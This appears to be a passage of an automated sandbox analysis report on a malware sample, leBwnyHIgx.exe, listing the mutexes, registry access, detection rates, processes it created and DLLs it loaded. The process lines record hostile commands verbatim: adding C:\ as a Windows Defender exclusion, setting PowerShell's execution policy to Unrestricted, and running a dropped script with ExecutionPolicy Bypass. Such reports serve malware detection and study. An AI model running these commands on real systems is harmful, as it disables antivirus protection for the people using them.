                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Mutant created: \Sessions\1\BaseNamedObjects\2024.12.25
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Mutant created: \Sessions\1\BaseNamedObjects\VJANCAVESU
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Local\Temp\PolicyManagement.xml
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: leBwnyHIgx.exe Virustotal: Detection: 29%
                      Source: leBwnyHIgx.exe ReversingLabs: Detection: 23%
                      Source: leBwnyHIgx.exe String found in binary or memory: /LoadInf=
                      Source: leBwnyHIgx.exe String found in binary or memory: -Helper process exited with failure code: 0x%x
                      Source: leBwnyHIgx.exe String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
                      Source: leBwnyHIgx.exe String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File read: C:\Users\user\Desktop\leBwnyHIgx.exe
                      Source: unknown Process created: C:\Users\user\Desktop\leBwnyHIgx.exe "C:\Users\user\Desktop\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\leBwnyHIgx.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: dinput8.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
